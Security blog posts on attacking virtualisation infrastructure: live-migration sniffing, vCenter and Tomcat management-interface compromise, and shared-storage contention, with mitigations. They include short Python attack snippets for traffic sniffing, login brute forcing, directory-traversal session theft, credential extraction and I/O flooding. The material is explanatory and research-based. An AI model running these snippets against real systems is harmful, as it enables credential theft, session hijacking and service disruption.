Attacking additional virtualisation infrastructure

10 02 2015

I should start by noting that almost all documents regarding live migration, High Availability (HA) and Fault Tolerance configurations state that these networks should be placed on isolated networks that are not shared with or accessible by unauthorised individuals. An article by Siebert (2011) specifically advises readers to:

“Keep management and storage traffic, for instance, on a physically isolated network that’s away from the regular VM network traffic”

However, this does not diminish the argument that this information is still being moved around inside the environment, and should these guidelines be overlooked or the networks breached, the consequences of what can be achieved may not be fully appreciated by staff familiar only with traditional methods.

Live migration traffic

Live migration can be used to move machines between hosts located in the same blade chassis, across campuses and even across continents, with minimal downtime (Travostino, et al., 2006). Performing a live migration from one host to another is a common feature found in many of the larger VMMMs such as Xen and VMware. The act of moving a machine across hosts in the VMware environment can be a manual or automated process when combined with other features such as DRS and DPM (Distributed Power Management). While the DRS feature is discussed in numerous earlier posts, DPM enables vCenter to automate the movement of machines off hosts during quiet periods of usage, allowing those hosts to be powered down and thus improving power consumption. It is my personal opinion that live migration is one of the more intriguing introductions of virtualisation, as the contents of RAM can include highly sensitive information.

Using the test environment I will demonstrate what is possible when access to the vMotion network is obtained. For this example a vMotion has been initiated specifying that VM1 on ESX1 is to be migrated – only the host portion is required to move, not the datastore. The VM will be moved to the only other host in the cluster, ‘ESX2’. To understand how this process is vulnerable to attack I will first break down the steps involved in this operation (Kutz, 2007):

  1. The request is made specifying the VM and which host it will be moved to.
  2. All of the RAM of VM1 is copied over the vMotion network to ESX2; any changes made during this time on ESX1 are written to a memory bitmap on ESX1.
  3. VM1 is quiesced on ESX1 and the memory contained in the bitmap is copied over the vMotion network to ESX2.
  4. VM1 is started on ESX2 and requests for access to the VM are directed to the instance on ESX2.
  5. Any remaining memory from VM1 is copied from ESX1, while memory is being read from and written to VM1 on ESX1.
  6. Once successful, VM1 is unregistered on ESX1 and the task is complete.

In Figure 1 we see a basic visual representation of the process in the test environment. For demonstration purposes and ease of displaying results, I have a separate vMotion network that uses a hub to connect the two machines. This allows me to sniff traffic without having to perform an additional attack such as a MiTM or configure port mirroring (SPAN/RSPAN).

Basic visual representation of the process of a machine being migrated to another host in the test environment


In the virtual machine that will be moved, I have written information into a text file but not saved it to disk, so that we can be sure it will be located in the machine's memory. The information in this example represents a secure document containing a username and password. The text file and its content are shown in Figure 2.

An unsaved text file that has been written on the running virtual machine


I now initiate a vMotion request and start a packet capture on the vMotion network using Wireshark. The network card is configured in promiscuous mode, allowing it to capture all of the packets being transmitted on the network. After the vMotion process has finished and the capture has been stopped, I am able to follow the TCP stream of the communication that took place between the two hosts and view the information in a searchable form. As shown in Figure 3, the information transmitted in the document is viewable in clear text, although separated by some punctuation.

A TCP stream of communication between the two hosts showing the notepad content

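For readers who prefer a scripted capture to the Wireshark GUI, below is a minimal sketch of the same passive capture using Python and scapy. It assumes the capture interface (here “eth1”) sees the vMotion segment and that vMotion is using its default TCP port of 8000; the marker searched for is the string written into the unsaved text file.

# Passively capture vMotion traffic and search it for a known plaintext marker.
from scapy.all import sniff, TCP, Raw

captured = bytearray()

def collect(pkt):
    # Append the raw TCP payload of every packet seen on the vMotion port
    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        captured.extend(bytes(pkt[Raw].load))

# Capture for the duration of the migration (a fixed timeout is used here for brevity)
sniff(iface="eth1", filter="tcp port 8000", prn=collect, store=False, timeout=120)

marker = b"Password"
offset = captured.find(marker)
print("marker found at offset", offset) if offset != -1 else print("marker not found")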

Although this example used a notepad document to demonstrate the ability to sniff data, there are much greater risks to consider when addressing passive snooping attacks on migration traffic. Microsoft stores LM authentication hashes for active sessions in memory (Pilkington, 2012) in all current versions of Windows. As a result, should a passive snooping attack take place while a machine is locked or logged on, the LM hash will also be viewable in the capture. Windows LM hashes can be reversed back into the user’s original password using online services such as (OS – Objectif Securite, 2012) and other hash-cracking tools. Finally, and possibly of most concern, is the accessibility of encryption keys. Even when full disk encryption is used to secure data, the keys (after initial user input) are cached in memory by the operating system. On traditional hardware this is considered the safest place, as volatile memory is erased quickly once the power is removed, and exploiting it usually requires physical access to the machine unless the machine is already infected. It is now possible, however, to sniff a live migration and obtain those cached keys without any physical access.

Live migration is not only vulnerable to sniffing attacks. In a paper written in 2007, Oberheide et al. (2007) describe a number of attacks that are possible against live migration traffic. In the paper the researchers discuss three ‘classes’ of threat that can be used against live migration environments:

  • Control plane
  • Data plane
  • Migration module

Control plane attacks

Control plane attacks target the mechanisms that are employed to initiate and manage migrations within the infrastructure manager. While no working control plane attacks were demonstrated in the paper, the theory behind them is still relevant and should be considered in a risk analysis exercise. The examples that Oberheide et al. (2007) highlight demonstrate how successful attacks on the control plane could result in:

  • The migration of machines onto illegitimate hosts that are owned by the attacker.
  • Mass migration of a large number of machines, thus overloading the network and causing disruption to service.
  • Manipulation of resource management for hosts in a DRS-style environment, so that machines are not evenly distributed and individual hosts become overwhelmed.

Data plane attacks

Data plane attacks are threats that take place on the networks over which the migrations travel. The passive snooping attack demonstrated previously is one of the attacks briefly mentioned in the paper. The second attack in the data plane class is described as ‘active manipulation’. As the name suggests, active manipulation is when data is changed during the migration of the machine. Although Oberheide et al. (2007) introduce their custom tool Xensploit for performing this attack, it is essentially a collection of existing attacks collated into one tool for ease of use. The attack uses MiTM techniques to intercept traffic between the two hosts and manipulate sections of the traffic (RAM) during transit. In their example, (Oberheide, et al., 2007, p. 4) showed how Xensploit could be used to establish an SSH (Secure Shell) session to a machine configured to only allow connections from authorised sources. Using Xensploit they were able to manipulate the object code of the sshd process in transit to add their own key as an authorised source, thus allowing them to SSH in once the new instance had completed its migration.

Migration module attacks

Lastly, although these attacks are included in the paper, I feel that this class falls under one of my previous topics, the hypervisor, rather than under live migration. The paper briefly covers attacks that exploit vulnerabilities in the migration modules that are part of the VMM (virtual machine monitor).

Combining attacks

Access to any one of these attack classes should be considered a high risk by security staff, although with access to just one vector it may still not be possible for an attacker to target a specific machine, depending on its physical location. If a combination of the attacks were available, the attacker would be able to leverage them to gain better control of the environment. An example of this is the data plane class of attacks, which are only useful if the target machine is being migrated during the period of capture. In environments where features such as DRS and DPM are not in use, machines can stay fixed to a host for a considerable period of time. If the attacker were able to use an attack at the control plane, they could trigger the migration of the necessary machines so that the attack could then take place at the data plane.
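
As a concrete illustration of that last point, the sketch below shows how an attacker holding valid vCenter credentials could trigger a vMotion programmatically using the pyVmomi library. The hostnames, credentials and VM names are placeholder assumptions; the point is simply that the same API administrators use is available to anyone with a valid session.

# Hedged sketch: trigger a live migration of "VM1" onto a chosen host via pyVmomi.
import ssl
from pyVim.connect import SmartConnect
from pyVmomi import vim

ctx = ssl._create_unverified_context()
si = SmartConnect(host="vcenter.example.com", user="stolen_admin", pwd="...", sslContext=ctx)
content = si.RetrieveContent()

def find_by_name(vimtype, name):
    # Walk the inventory for the first object of the given type with the given name
    view = content.viewManager.CreateContainerView(content.rootFolder, [vimtype], True)
    try:
        return next(obj for obj in view.view if obj.name == name)
    finally:
        view.Destroy()

vm = find_by_name(vim.VirtualMachine, "VM1")
target_host = find_by_name(vim.HostSystem, "esx2.example.com")

# Issue the vMotion, forcing VM1 onto the attacker's chosen host
task = vm.Migrate(host=target_host, priority=vim.VirtualMachine.MovePriority.defaultPriority)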

Shortly after the paper was released, VMware’s Wu (2008) commented on this attack:

“Although impressive, this work by no means represents any new security risk in the datacentre… Rather, it [is] a reminder of how an already-compromised network, if left unchecked, could be used to stage additional severe attacks in any environment, virtual or physical.”

While I can appreciate what Wu (2008) is saying, I must disagree that these types of attack are comparable to those in physical environments. Data in transit on physical systems does not tend to include such sensitive information, and it is better understood in traditional systems that insecure protocols such as email and FTP should not be used to transfer confidential information. While the previous example required physical access to the vMotion network, it is also possible to access this data remotely through misconfiguration, access to the management interface or manipulation of the virtual infrastructure.

Wu, W., 2008. VMware Security & Compliance Blog. [Online] Available at: http://blogs.vmware.com/security/2008/02/keeping-your-vm.html

Siebert, E., 2011. Five VMware security breaches that should never happen. [Online] Available at: http://searchvmware.techtarget.com/tip/Five-VMware-security-breaches-that-should-never-happen

Travostino, F., Daspit, P. & Gommans, L., 2006. Seamless live migration of virtual machines over the MAN/WAN. Future Generation Computer Systems – IGrid 2005: The global lambda integrated facility, 22(8), pp. 901-907.

Kutz, A., 2007. How to obtain, configure and use VMotion and how VMotion works. [Online] Available at: http://searchvmware.techtarget.com/tip/How-to-obtain-configure-and-use-VMotion-and-how-VMotion-works

Pilkington, M., 2012. Protecting Privileged Domain Accounts: LM Hashes — The Good, the Bad, and the Ugly. [Online] Available at: http://computer-forensics.sans.org/blog/2012/02/29/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly

Oberheide, J., Cooke, E. & Jahanian, F., 2007. Empirical Exploitation of Live Virtual Machine Migration. [Online] Available at: http://www.eecs.umich.edu/techreports/cse/2007/CSE-TR-539-07.pdf





Post exploitation on management interfaces

7 11 2014

Once an attacker successfully gains admin access to a particular element of the management infrastructure, what is possible? In traditional networks, the compromise of an ‘Enterprise Admin’ or ‘root’ account would be a worst-case scenario. Using this account, an attacker could log on to servers, delete accounts, data and policies, and affect services running on those servers. Without pre-defined scripting, however, all of these actions would need to be performed manually on each server, which of course has time implications. The attack would be effective, but once identified, action could be taken on uncompromised servers, and machines not connected to the network by a domain trust would remain unaffected.

Now consider a fully virtualised environment that is fully managed by a single management interface (which, from the author’s experience, is not uncommon). Should an attacker obtain admin access to a management interface, then the implications are much greater.

Data centre management system (vCenter, SCOM)

If an attacker were to gain admin access to the management software that controls the environment, the implications from a defensive point of view are devastating. From inside the console they would be able to delete configurations, virtual switches and even full machines, from both a management and a disk perspective. A common practice in large environments is to create a disaster recovery environment in another location of the campus or business, so that in the event of a loss of service in one location, the mirror environment can be used. It is not uncommon for both locations to be managed by the same management software, as this allows increased replication and failover. While this may increase availability and functionality, it also means that gaining access to the one system could potentially allow an attacker to erase an entire site, including any recovery environment.

While they may not have the same initial impact, there are also a number of other actions that could be completed by the attacker once access to a management interface is gained. Misconfigurations in the way the hardware performs could go unnoticed for a long period of time, yet still cause huge disruption to services and be harder and more time-consuming to identify. There are also persistent attacks that could be configured for snooping, such as placing switches into promiscuous mode in order to perform undetected information gathering. It is also possible from the interface to copy full machines offline and boot them up using consumer tools such as VMware Player (VMware, 2012) for analysis and offline attacks (Siebert, 2011).

Storage interfaces

While there are only so many actions that can be taken as a result of gaining access to the interfaces that manage the storage, they are equally disruptive. Entire disk arrays can be remotely wiped, resulting in the loss of multiple servers and the data stored on that storage in one action. Disks could also be misconfigured to affect the performance of all machines operating on that array.

Hardware management (iLO, DRAC, RSA, On-board Administrator)

With access to the hardware management interface an attacker would be able to perform physical actions on the infrastructure remotely. These interfaces control the hardware underlying the hypervisors, the interconnect fabric, and the power and cooling of blade systems. Although most of the actions possible from here are reversible, they still present a single targetable area that has the potential to severely affect service for a considerable period of time.

 

Siebert, E., 2011. Five VMware security breaches that should never happen. [Online] Available at: http://searchvmware.techtarget.com/tip/Five-VMware-security-breaches-that-should-never-happen





Attacking management interfaces

29 09 2014

The management interfaces, and everything that is incorporated into that software, are, in the author’s opinion, the most problematic area in virtualisation security today. There have been numerous attempts over the last few years to demonstrate how management interfaces can be breached. The majority of these attacks are general attacks that use pre-existing attack methods such as brute forcing, MiTM (man-in-the-middle) and the numerous flaws in the PKI infrastructure. There are multiple proven attack methods available for exploiting management interfaces, and below are descriptions of some of the attacks that have been discovered by researchers.

In an online blog post, Mluft (2011) describes how a brute force attack on the Amazon Web Services (AWS) portal is achievable by leveraging existing hacking tools. In the attack, Mluft (2011) demonstrated how it is possible to determine a successful logon using the example payloads in Burp Suite (Burp Suite, 2012). Burp Suite is used in this example simply to automate the process of attempting logins against the interface. A failed login attempt is identified by the portal returning an HTTP status code of 200 (Network Working Group, 1999), while a correct password attempt is identified by a returned HTTP status code of 302. Using the documentation provided by Amazon regarding password policies, Mluft (2011) created an appropriate wordlist and used Burp Suite to attempt all the possible permutations. After 400,000 attempts the attack was paused and the results filtered for the 302 status code. A 302 response was found, shown alongside the password value that had been attempted. This gave the attacker the username and password for the administration of all servers managed by that account. It should be noted that all of these attempts originated from one IP address without the account being locked out or subject to any throttling.
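
The same 200/302 heuristic is easy to script directly. Below is a minimal sketch using Python and the requests library; the login URL and form field names are hypothetical placeholders used purely to illustrate the technique, not the real AWS portal layout.

# Try each candidate password and treat a 302 redirect as a probable success.
import requests

LOGIN_URL = "https://portal.example.com/login"   # hypothetical endpoint
USERNAME = "admin@example.com"                   # hypothetical account

with open("wordlist.txt") as fh:
    for candidate in (line.strip() for line in fh):
        resp = requests.post(
            LOGIN_URL,
            data={"email": USERNAME, "password": candidate},  # hypothetical field names
            allow_redirects=False,   # keep the raw status code (302 vs 200)
            timeout=10,
        )
        if resp.status_code == 302:
            print("possible valid password:", candidate)
            break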

As discussed in my earlier blog article regarding the hypervisor, the Virtualization Assessment Toolkit (VASTO) has been developed to exploit multiple weaknesses, predominantly in the VMware family. As well as the identification module that returns the exact version of the server, it includes numerous attacks on virtual systems, including a specific VMware brute forcing module that mimics the attack on the AWS portal by Mluft (2011). One of the main contributors to the VASTO project, Criscione (2010), demonstrated a number of the different functions found in VASTO at Blackhat USA 2010. Although Criscione (2010) demonstrated how VASTO can be used at multiple layers of the virtual stack (client, hypervisor, support, management and internal), the majority of the talk concentrated on the management portion. Criscione (2010) confirms that although the VMware (2012) hardening guide recommends segmentation of management networks, these recommendations are often ignored and management interfaces are left on the same networks as traditional servers.

These servers that manage the entire fabric of the infrastructure have multiple attack vectors – from the operating systems they are installed on to the web services running the interfaces. Vulnerabilities in any one of these platforms can potentially jeopardise the security of an entire environment and should be taken very seriously.

The other VASTO modules that target the management portion of the virtual infrastructure use flaws in VMware components and their implementation to expose threats in the infrastructure. One of the exploits included in the VASTO suite that best demonstrates how multiple components in these systems can be chained together for exploitation originates in a flaw in the Jetty (Eclipse, 2012) web server used by vCenter Update Manager. In the author’s opinion, this attack shows how the complexity and code overhead that these management servers introduce make securing virtual environments efficiently something that needs to be understood and prioritised. I will briefly give a breakdown of this attack to highlight the multiple elements that were used to complete it.

The Update Manager component of the vSphere suite is designed to secure the environment by automating the patching and updating of hosts that fall under its management scope. However, Criscione (2010) recognised that Update Manager requires a version of the Jetty web server to operate, an additional component added to the total footprint of the management server. The version of Jetty installed prior to version 4.1 u1 (update 1) of Update Manager was vulnerable to a directory traversal attack (Wilkins, 2009), which allowed attackers to view any file on the server that the Windows SYSTEM user has privileges to read. Coincidentally, vCenter stores a file on the server called “vpxd-profiler-*”, which is used by administrators for debugging purposes. This extensive file contains the SOAP session IDs of all the users that have connected to that server. With such an ID, the vmware_session_rider module found in the VASTO toolkit acts as a proxy server, allowing the attacker to connect through it into the vCenter server using the selected administrator’s SOAP ID. Once this is completed, the attacker is able to create a new admin credential within vCenter to ensure future access.
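
A rough sketch of the first two steps is shown below: request a file through the traversal flaw, then pull candidate session identifiers out of the vpxd-profiler output. The port, traversal path and regular expression are illustrative assumptions only; the real paths and file names depend on the vCenter and Update Manager versions in use.

# Fetch the debug file via a hypothetical traversal path and extract session IDs.
import re
import requests

TARGET = "https://vcenter.example.com:9084"                   # assumed Update Manager port
TRAVERSAL = "/vci/downloads/..%5C..%5C..%5Cvpxd-profiler-1"   # hypothetical traversal path

resp = requests.get(TARGET + TRAVERSAL, verify=False, timeout=15)

# The pattern below is a rough illustration of what a SOAP session token might look like
session_ids = set(re.findall(r'soap[_-]?session[^"]*"([0-9A-Fa-f-]+)"', resp.text, re.IGNORECASE))
print("candidate SOAP session IDs:", session_ids)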

Another example of how different elements of the management interface could be used to gain access to vCenter is through VMware’s use of Apache Tomcat (The Apache Software Foundation, 2012). When navigating to a vCenter server through a web browser, one is presented with the standard vSphere “Getting started” screen, as shown in Figure 1.

Web browser connection to vCenter server


Connecting to that same server’s IP address, but specifying Tomcat’s default index page port of 8443 over an SSL connection, shows further information, including a link to log in as the “Tomcat manager”. This page is shown in Figure 2.

The web interface seen when you navigate to vCenter with a port of 8443


In VMware version 4.1 there is a user named “VMwareAdmin” that is automatically added to the Tomcat server and which has full admin rights to the Tomcat service. In the earlier versions of VMware, the password for this admin account was only five characters long: three uppercase letters, one number and one lowercase letter. This leaves an attacker with a number of options. The most obvious is to brute force the credentials with a compatible tool or script such as the Apache Tomcat brute force tool (Snipt, 2011). A second (and more sophisticated) attack would be to use the folder traversal vulnerability introduced by the Jetty service to gain read access to the server. From here the attacker could navigate to the “tomcat-users.xml” file (C:\Program Files\VMware\Infrastructure\tomcat\conf), as shown in Figure 3; this is an XML file found in VMware 4.1 that shows the clear-text credentials of the account.

(left) The tomcat-users.xml file showing the username and password of a default admin account (Right) tomcat manager login prompt

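Once the tomcat-users.xml file has been retrieved, pulling the credentials out of it is trivial. The sketch below parses a locally saved copy of the file; the attribute names follow the standard Tomcat format, though the exact layout may differ between versions.

# Extract usernames, passwords and roles from a retrieved tomcat-users.xml file.
import xml.etree.ElementTree as ET

tree = ET.parse("tomcat-users.xml")
for element in tree.getroot().iter():
    if element.tag.endswith("user"):
        name = element.get("username") or element.get("name")
        print(name, element.get("password"), element.get("roles"))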

Using this access, an attacker is able to control elements of the web service with admin rights. As shown in Figure 4, one is able to change a number of settings through the Tomcat interface, including the ability to upload custom WAR files, which can be created using Metasploit to deliver Meterpreter payloads to the server.

Logged in to the tomcat manager using the credentials found on server


Although some of the attacks using the VASTO toolkit are specific and use vulnerabilities that have almost all been patched by VMware (at the time of writing), the management interfaces are still vulnerable to more general network attacks that cannot be remedied simply by applying a patch or updating to the newest version. As explained briefly in my post on hypervisors, these interfaces are vulnerable to MiTM attacks and the implementation’s dependence on a highly insecure certificate/PKI model. These vulnerabilities are not directly the responsibility of the vendors, but certainly nothing has been done by them to address the issue.

I will not be explaining the process of how MiTM attacks and flaws in the certificate infrastructure can be used to capture login credentials, as this is a fundamental part of security and has been covered on numerous occasions by multiple sources (Irongeek, 2012) (Schneier, 2011). I have also written about the overarching problems with the certificate model and how it can be bypassed in a blog post from 2011.

 

Mluft, 2011. The Key to your Datacenter. [Online] Available at: http://www.insinuator.net/2011/07/the-key-to-your-datacenter/

Criscione, C., 2010. Blackhat 2010 – Virtually Pwned. USA: Youtube.

Wilkins, G., 2009. Vulnerability in ResourceHandler and DefaultServlet with aliases. [Online] Available at: http://jira.codehaus.org/browse/JETTY-1004

Irongeek, 2012. Using Cain to do a “Man in the Middle” attack by ARP poisoning. [Online] Available at: http://www.irongeek.com/i.php?page=videos/using-cain-to-do-a-man-in-the-middle-attack-by-arp-poisoning

Schneier, B., 2011. Schneier on Security. [Online] Available at: http://www.schneier.com/blog/archives/2011/09/man-in-the-midd_4.html





Mitigation techniques for shared hardware

4 06 2014

The concept of mitigation techniques to reduce the likelihood of shared hardware attacks is similar to that of the hypervisor techniques, in terms of determining which machines have access to which host. To ensure isolation of the hosts, the same measures can be used as described in an earlier post regarding hypervisors, such as using DRS groups and, in larger cloud environments, specific hardware-conscious options such as the ‘Dedicated VDC’ in VMware’s vCloud Datacentre. While host isolation is achievable using these methods, it only addresses physical component allocation at the host level, such as RAM, CPU and mezzanine cards/NICs. What it does not address is the issue of shared storage and blade infrastructure.

Where ‘in house’ storage is concerned, separate groups of arrays could be used to limit which systems an attack could affect. In the same way that DRS groups were created in the hypervisor demonstrations, machines could be grouped by security rating so that less secure machines are not placed on the same array as higher-value machines. This mitigates the risk of a less secure system threatening the performance of a group of high-value machines through vulnerabilities found in the VM. With this measure, however, there is also the consideration that in doing so you are creating one high-value target area that, if attacked, affects all the core services. The increase in security that segmentation of disk arrays creates unfortunately has an adverse effect on resource efficiency, as the smaller the array the higher the disk overhead (Shangle, 2012), (International Computer Concepts, 2012).

There are options within some VMMMs (certainly within vCenter) to evenly distribute and limit the number of IOPS a single machine is able to request. This can be set per machine using the resource allocation section. Within the vCenter suite, ‘share values’ can also be assigned to individual machines to automatically limit disk allocation should disk latency reach a certain threshold. The latter option is not included in the core functionality of the vSphere suite and therefore carries an additional licence cost. In the figure below you will see that the limit has been set to 1000 IOPS for the ‘Public-Web’ virtual machine. While this option does stop one machine from overwhelming the entire storage, it can also unnecessarily restrict genuine requests from VMs should they experience a higher than normal workload.

Using the free IOPS limiting ability in vCenter


 

The additionally licensed ‘Storage I/O Control’ feature from VMware allows one to associate a share value with machines rather than a set resource threshold. A latency figure can be set on a LUN and, should that threshold be reached, vCenter will ensure that the machine with the highest costing (share value) gets the specified disk allocation it requires. To protect internally hosted environments, core servers would be given the highest costing, while less important, more vulnerable machines would be allocated lower figures to ensure that key functions of the business continue to operate should this type of attack take place.

In circumstances where these options are not available in the VMMM, such as is the case with the standard Hyper-V manager, which “does not have any built in mechanism to dynamically or even statically control storage I/O”  (Berg, 2011), alternative solutions will be required.

Avoiding sharing is undoubtedly the simplest option when securing high-risk, mission-critical systems. The challenge becomes more complicated when considering public cloud environments. Avoiding storage contention caused by noisy or malicious neighbours on a public cloud service is something that should be seriously considered before any cloud adoption takes place. Many big companies are now using public cloud infrastructure to host their services. Amazon has had impressive adoption rates, with online services including Netflix (Business Wire, 2010), Reddit (Berg, 2010), MySpace (High Scalability, 2010) and many others opting to migrate their entire business onto Amazon’s EC2/S3 infrastructure.

One example of how resource contention can be avoided within a public cloud comes from Netflix’s Cockcroft (2011), who extensively researched the inner workings of Amazon’s EBS (Elastic Block Store) so that Netflix could best utilise the service and not be affected by neighbours’ disk requirements. Cockcroft (2011) noted that Amazon’s EBS volumes were between 1 GB and 1 TB in allocated size, and it was decided that allocating volumes in 1 TB blocks to the Netflix servers, regardless of their actual storage requirements, reduces the likelihood of co-tenancy and, in turn, storage contention. Amazon makes this approach feasible because a large amount of information is available about the EC2 service, especially when compared to other providers. Having access to this level of information should be a key consideration when planning any cloud migration.
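
As a simple illustration of the approach, the sketch below requests a full-size volume using the boto3 library regardless of actual need. The region, availability zone and volume type are assumptions, and the 1 TB ceiling described above reflects EBS limits at the time; current EBS volumes can be far larger.

# Always request the maximum-size volume so the backing disk is less likely to be shared.
import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")

volume = ec2.create_volume(
    AvailabilityZone="us-east-1a",
    Size=1024,              # size in GiB: request the full 1 TB regardless of actual need
    VolumeType="standard",  # magnetic volumes, as in the original EBS offering
)
print("created volume", volume["VolumeId"])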

The threat of an exploit at the blade hardware layer is extremely difficult to mitigate, and cannot be addressed without taking unrealistic precautions that undermine the reasoning and benefits of a blade system altogether. While there may be scope within the larger blade systems to use separate physical interconnect modules to ensure that secure and insecure machines use different routes in and out of the enclosure, there is still the backplane of the chassis, which is completely shared among all hosts. As mentioned previously, hardware attacks at this layer of the system would most likely be DoS attacks rather than disclosure, and have yet to be demonstrated.

Shangle, R., 2012. Level 0,1,2,3,4,5,0/1. [Online]  Available at: http://it.toolbox.com/wiki/index.php/Level_0,1,2,3,4,5,0/1

Business Wire, 2010. Netflix Selects Amazon Web Services To Power Mission-Critical Technology Infrastructure. [Online] Available at: http://www.thestreet.com/story/10749647/netflix-selects-amazon-web-services-to-power-mission-critical-technology-infrastructure.html

Cockcroft, A., 2011. Understanding and using Amazon EBS – Elastic Block Store. [Online] Available at: http://perfcap.blogspot.co.uk/2011/03/understanding-and-using-amazon-ebs.html

Berg, M. v. d., 2011. Storage I/O control for Hyper-V. [Online] Available at: http://up2v.nl/2011/06/20/storage-io-control-for-hyper-v/





Attacking shared hardware used for virtualisation

5 05 2014

There are a number of conjectural and proven attacks that involve the exploitation of shared hardware. One of the more relevant attacks threatening virtual environments is the ability to degrade the performance of other machines by placing an unpredictable strain on the shared hardware. This could be achieved either by taking control of a virtual machine in the environment through an existing software exploit or, in the case of a cloud provider, simply by purchasing one. Amazon has multiple security measures in place to deal with inside attacks on its Amazon Web Services (AWS) platform, but with a Microsoft Windows instance costing as little as $0.115 per hour, there is a very low cost of entry for attackers. While one moderately powered machine would not be able to affect numerous neighbouring clients’ performance on Amazon’s infrastructure, this low entry figure demonstrates how little it would cost to rent multiple instances for a clustered attack.

Although not primarily considered a security issue, resource contention is a major issue within virtual systems, especially when operating in multi-tenant environments. The term “noisy neighbours” is used to describe virtual instances sharing the same host or storage as another machine and affecting its performance. Problems caused by noisy neighbours or resource-intensive virtual machines are typically due either to a misconfiguration or simply to being unfortunate enough to be placed on the same hardware as other high-performance machines. When considering this issue from a security perspective, however, if an attacker is able to place a number of machines on the same shared hardware as a competitor’s machine, they have the ability to degrade its performance. There has been prior research into determining the internal mapping of machines within large cloud infrastructures. In one paper, entitled “Hey, You, Get Off of My Cloud!” (Ristenpart, et al., 2009), the authors use the Amazon EC2 service as their environment to test the ability to map the internal location of machines and discuss how this information can be used to construct machines that co-reside with specific targets. While the specific methods involved in determining the internal location of a machine in large cloud environments are out of scope for this article, the paper describes how an accurate mapping can be achieved using “timestamp fingerprinting” and “cache-based detection”.

Studies often measure the impact that noisy neighbours cause on co-residing tenants by analysing RAM, CPU or network usage. While these are relevant elements that are affected, one major drawback of only measuring these aspects is that disk activity, such as the IOPS (Input/Output Operations Per Second) placed on shared storage, is not taken into consideration. This can be one of the more difficult elements to measure, as storage arrays can differ greatly in both size and performance, even within the same provider. Misbehaving disk activity can also be much more erratic, especially when compared to RAM usage, which tends to increase gradually rather than produce the spikes seen in IOPS.

One attack that would be possible using shared storage would be to use the mapping techniques described by (Ristenpart, et al., 2009) to place a group of machines on the same storage array or LUN as a target before generating high I/O. If the activity generated were high enough, contention for disk access would be experienced by all machines using that storage and, as a result, machines would become noticeably slower due to the disk latency created. Amazon EC2 does not limit the amount of I/O that a machine can use, as it is a chargeable resource billed to the owning customer’s account based on usage. These charges would obviously not be a problem for an attacker using a stolen credit card, for example. While there are a number of articles (Cockcroft, 2011) about the consequences of sharing storage with other busy or malfunctioning VMs, the author has not found any documentation recognising deliberately crafted IOPS as an attack. A demonstration of how this attack could be carried out is shown later in this section.
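
A crude way to generate that kind of load from inside a guest is sketched below (the demonstration later in this section uses the SQLIO utility instead). The file name and sizes are illustrative assumptions; the test file needs to be large enough, and the writes synchronous, so that the load actually reaches the backing array rather than being absorbed by caches.

# Generate sustained random-write I/O against the guest's disk.
import os
import random

FILE = "stress.dat"
FILE_SIZE = 4 * 1024**3      # 4 GiB test file (assumed large enough to defeat caching)
BLOCK = 8 * 1024             # 8 KB blocks

# Create the test file once
if not os.path.exists(FILE):
    with open(FILE, "wb") as fh:
        fh.truncate(FILE_SIZE)

# Issue random writes indefinitely, forcing each one through to the storage array
with open(FILE, "r+b", buffering=0) as fh:
    while True:
        fh.seek(random.randrange(0, FILE_SIZE - BLOCK, BLOCK))
        fh.write(os.urandom(BLOCK))
        os.fsync(fh.fileno())    # flush past the OS cache so the array sees the write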

Attacks that use shared hardware as a vector are not only capable of affecting availability, but all three aspects of the Confidentiality, Integrity, Availability (CIA) triad (Perrin, 2008). The confidentiality of machines on virtual systems should also be a consideration before adoption takes place. While some of the attacks that exploit the confidentiality and integrity portions of the CIA triad using shared hardware fall on the academic side of the spectrum rather than being active exploits, these concepts should at least be taken into consideration, especially by high-risk targets.

One example of how a shared CPU can be manipulated is Phil’s (2012) demonstration of how two machines running on the same host can communicate with each other without using any networking protocols. This type of attack is typically known as a side-channel attack and has been a known issue for a number of years (Page, 2003), (Osvik, et al., 2005). In Phil’s (2012) ‘virtualisation specific attack’, there are a number of pre-requisites for the attack to be successful, including both virtual machines having the same number of processors and running on the VMware platform with unlimited CPU resources. However, once all of the appropriate elements were in place, Phil (2012) was able to send data bits from one VM to another over the CPU by oversubscribing the hardware. While this attack may be extremely niche and inefficient, with transfer rates as slow as 0.5 bits/sec (depending on the noise of other machines on that host), it does show the principle of how attacking virtual machines at this layer is possible.
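
The sketch below is a heavily simplified illustration of the general idea, not Phil's actual technique: a sender burns CPU for a fixed time slot to signal a 1 and idles to signal a 0, while a receiver on the same oversubscribed host times a fixed workload in each slot and infers the bit from the slowdown. The slot length and threshold are arbitrary assumptions, and real-world noise makes such channels far less reliable than this suggests.

# Toy CPU-contention covert channel: timing a probe workload reveals the sender's activity.
import time

SLOT_SECONDS = 1.0

def send_bits(bits):
    for bit in bits:
        end = time.time() + SLOT_SECONDS
        if bit:
            while time.time() < end:
                pass                      # busy-loop: contend for the shared CPU
        else:
            time.sleep(SLOT_SECONDS)      # idle: leave the CPU uncontended

def receive_bits(count, threshold=0.05):
    bits = []
    for _ in range(count):
        start = time.perf_counter()
        for _ in range(10**6):            # fixed probe workload
            pass
        elapsed = time.perf_counter() - start
        bits.append(1 if elapsed > threshold else 0)
        time.sleep(max(0.0, SLOT_SECONDS - elapsed))
    return bits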

An area that the author would be interested in investigating further (having been unable to find any existing research in the area) is the security implications of the shared hardware involved in blade environments. The most effective way to ensure the integrity of an environment is to adopt the ultra-cautious approach of disconnecting machines from the internet and any other connecting networks. This is known as an ‘air gap’, and is typically used to secure high-value environments such as SCADA (supervisory control and data acquisition) systems. Blade systems such as the PowerEdge M1000e offer “compelling operational benefits, such as improved cabling, rapid hardware provisioning, high compute density, energy-efficient design and increasing management automation”, and can offer enough resources to individually power an entire large organisation or business. Using VLANs, multiple networks can be hosted within the one enclosure, including Demilitarised Zones (DMZ) and Virtual Desktop Infrastructures (VDI). While research has been done into the sharing of components such as RAM and CPU, elements of the blade environment such as the chassis backplane and the connection fabric into the system pose an equal if not greater risk. If malicious software were able to infect the software that manages these physical elements of the system, it could potentially monitor and affect the integrity of information to and from any virtual machine or host.

